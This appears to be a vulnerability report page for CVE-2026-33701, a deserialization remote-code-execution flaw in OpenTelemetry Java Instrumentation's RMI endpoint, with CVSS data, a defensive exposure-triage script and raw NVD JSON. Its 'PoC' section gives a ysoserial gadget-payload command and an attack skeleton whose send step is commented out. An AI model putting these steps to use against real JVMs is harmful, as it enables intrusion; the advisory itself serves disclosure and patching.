Security Vulnerability Report
CVE-2026-33701 CVSS 9.8 CRITICAL

CVE-2026-33701

Published: 2026-03-27 01:16:19
Last Modified: 2026-04-01 16:00:07

Description

OpenTelemetry Java Instrumentation provides OpenTelemetry auto-instrumentation and instrumentation libraries for Java. In versions prior to 2.26.1, the RMI instrumentation registered a custom endpoint that deserialized incoming data without applying serialization filters. On JDK 16 and earlier, an attacker with network access to a JMX or RMI port on an instrumented JVM could exploit this to potentially achieve remote code execution. All three of the following conditions must be true to exploit this vulnerability: first, OpenTelemetry Java instrumentation is attached as a Java agent (`-javaagent`) on Java 16 or earlier; second, a JMX/RMI port has been explicitly configured via `-Dcom.sun.management.jmxremote.port` and is network-reachable; third, a gadget-chain-compatible library is present on the classpath. The result is arbitrary remote code execution with the privileges of the user running the instrumented JVM. For JDK >= 17, no action is required, but upgrading is strongly encouraged. For JDK < 17, upgrade to version 2.26.1 or later. As a workaround, set the system property `-Dotel.instrumentation.rmi.enabled=false` to disable the RMI integration.
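As an added triage example (not code from this report or from the OpenTelemetry project): the advisory's three conditions, plus the workaround flag, expressed as a check over a JVM's command line, its Java version string, the attached agent's version and the jar names on its classpath. The command line, versions and jar names below are constructed samples. The `commons-collections` name test is a heuristic standing in for "a gadget-chain-compatible library", which the advisory does not enumerate (it is the library the page's CommonsCollections5 payload relies on), and whether the JMX port is actually reachable still has to be confirmed on the network.

```python
"""Exposure triage for CVE-2026-33701 (added example; not OpenTelemetry code).

Evaluates the advisory's three conditions against a JVM's command line,
its Java version string, the attached agent's version and the jar names on
its classpath. Every sample value in run_samples() is constructed; nothing
here talks to a live JVM.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

FIXED_AGENT_VERSION = (2, 26, 1)      # first fixed release per the advisory
LAST_AFFECTED_JAVA_MAJOR = 16         # JDK >= 17 needs no action
# Heuristic, not from the advisory: it only says "a gadget-chain-compatible
# library"; commons-collections is what the page's CommonsCollections5 PoC needs.
GADGET_JAR_HINTS = ("commons-collections",)


def version_tuple(text: str):
    """'2.25.0' -> (2, 25, 0); tolerates suffixes such as '-alpha'."""
    return tuple(int(n) for n in re.findall(r"\d+", text)[:3])


def java_major(version: str) -> int:
    """'1.8.0_392' -> 8, '11.0.21' -> 11, '17' -> 17."""
    parts = version.split(".")
    if parts[0] == "1" and len(parts) > 1:
        return int(parts[1])
    return int(re.match(r"\d+", parts[0]).group())


def sysprop(cmdline: str, name: str) -> Optional[str]:
    """Value of -Dname=value on the command line, or None if absent."""
    m = re.search(r"-D" + re.escape(name) + r"=(\S+)", cmdline)
    return m.group(1) if m else None


@dataclass
class Finding:
    agent_attached: bool
    agent_version_affected: bool
    java_affected: bool
    jmx_port: Optional[int]
    rmi_instrumentation_enabled: bool
    gadget_jar_present: bool

    @property
    def exploitable(self) -> bool:
        """True only when every advisory condition holds and the workaround is
        absent. Reachability of jmx_port must be confirmed separately."""
        return (self.agent_attached and self.agent_version_affected
                and self.java_affected and self.jmx_port is not None
                and self.rmi_instrumentation_enabled and self.gadget_jar_present)

    @property
    def action(self) -> str:
        if not self.agent_attached:
            return "not applicable: OpenTelemetry agent not attached"
        if not self.java_affected:
            return "no action required on JDK >= 17; upgrade encouraged"
        if not self.agent_version_affected:
            return "already on 2.26.1 or later"
        if not self.rmi_instrumentation_enabled:
            return "workaround in place (otel.instrumentation.rmi.enabled=false); still upgrade to 2.26.1+"
        return "upgrade to 2.26.1+ or set -Dotel.instrumentation.rmi.enabled=false"


def assess(cmdline: str, java_version: str, agent_version: str,
           classpath_jars: List[str]) -> Finding:
    attached = bool(re.search(r"-javaagent:\S*opentelemetry-javaagent\S*\.jar", cmdline))
    port = sysprop(cmdline, "com.sun.management.jmxremote.port")
    rmi_flag = sysprop(cmdline, "otel.instrumentation.rmi.enabled")
    return Finding(
        agent_attached=attached,
        agent_version_affected=version_tuple(agent_version) < FIXED_AGENT_VERSION,
        java_affected=java_major(java_version) <= LAST_AFFECTED_JAVA_MAJOR,
        jmx_port=int(port) if port and port.isdigit() else None,
        rmi_instrumentation_enabled=(rmi_flag or "true").lower() != "false",
        gadget_jar_present=any(h in jar.lower() for jar in classpath_jars for h in GADGET_JAR_HINTS),
    )


# Constructed sample: what `ps -o args` might show for an instrumented service.
SAMPLE_CMDLINE = ("java -javaagent:/opt/otel/opentelemetry-javaagent.jar "
                  "-Dcom.sun.management.jmxremote.port=9010 "
                  "-Dcom.sun.management.jmxremote.authenticate=false -jar app.jar")
SAMPLE_JARS = ["app.jar", "commons-collections-3.2.1.jar", "guava-31.1-jre.jar"]


def run_samples():
    return {
        "vulnerable": assess(SAMPLE_CMDLINE, "11.0.21", "2.25.0", SAMPLE_JARS),
        "workaround": assess(SAMPLE_CMDLINE + " -Dotel.instrumentation.rmi.enabled=false",
                             "11.0.21", "2.25.0", SAMPLE_JARS),
        "jdk17": assess(SAMPLE_CMDLINE, "17.0.9", "2.25.0", SAMPLE_JARS),
        "fixed": assess(SAMPLE_CMDLINE, "1.8.0_392", "2.26.1", SAMPLE_JARS),
    }


if __name__ == "__main__":
    for name, f in run_samples().items():
        print(f"{name:11s} exploitable={f.exploitable!s:5s} -> {f.action}")
```

The check deliberately treats the JMX port as "configured" rather than "reachable": `-Dcom.sun.management.jmxremote.port` on the command line is necessary but not sufficient, so a port scan from the attacker's network position is the second half of the assessment.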

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:linuxfoundation:opentelemetry_instrumentation_for_java:*:*:*:*:*:*:*:* - VULNERABLE
OpenTelemetry Java Instrumentation < 2.26.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# PoC concept: deliver a serialized gadget-chain payload to the RMI port of an
# instrumented JVM. This is a skeleton of the attack flow, not a working exploit.
import socket
import sys

# Generate the payload with ysoserial (e.g. CommonsCollections5); the chain
# only fires if a matching commons-collections version is on the target's classpath:
#   java -jar ysoserial.jar CommonsCollections5 'calc.exe' > payload.bin

TARGET_HOST = sys.argv[1] if len(sys.argv) > 1 else 'target-ip'
# The port configured via -Dcom.sun.management.jmxremote.port, e.g. 9010
TARGET_PORT = int(sys.argv[2]) if len(sys.argv) > 2 else 9010

with open('payload.bin', 'rb') as f:
    payload = f.read()

print(f"[*] Loaded {len(payload)} bytes of payload for {TARGET_HOST}:{TARGET_PORT}")

# Note: writing the raw serialized object to the socket is not a valid RMI
# exchange. Real exploitation has to speak JRMP (protocol handshake, then a
# call whose arguments carry the object), e.g. with ysoserial's
# exploit.JRMPClient or exploit.RMIRegistryExploit modules. The lines below
# are kept only as a simplified sketch of the attack flow.
# sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# sock.connect((TARGET_HOST, TARGET_PORT))
# sock.sendall(payload)
# sock.close()
print('[*] Payload prepared; this sketch does not send it.')
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33701", "sourceIdentifier": "[email protected]", "published": "2026-03-27T01:16:19.313", "lastModified": "2026-04-01T16:00:06.900", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenTelemetry Java Instrumentation provides OpenTelemetry auto-instrumentation and instrumentation libraries for Java. In versions prior to 2.26.1, the RMI instrumentation registered a custom endpoint that deserialized incoming data without applying serialization filters. On JDK version 16 and earlier, an attacker with network access to a JMX or RMI port on an instrumented JVM could exploit this to potentially achieve remote code execution. All three of the following conditions must be true to exploit this vulnerability: First, OpenTelemetry Java instrumentation is attached as a Java agent (`-javaagent`) on Java 16 or earlier. Second, JMX/RMI port has been explicitly configured via `-Dcom.sun.management.jmxremote.port` and is network-reachable. Third, gadget-chain-compatible library is present on the classpath. This results in arbitrary remote code execution with the privileges of the user running the instrumented JVM. For JDK >= 17, no action is required, but upgrading is strongly encouraged. For JDK < 17, upgrade to version 2.26.1 or later. As a workaround, set the system property `-Dotel.instrumentation.rmi.enabled=false` to disable the RMI integration."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-502"}]}], "c ... (truncated)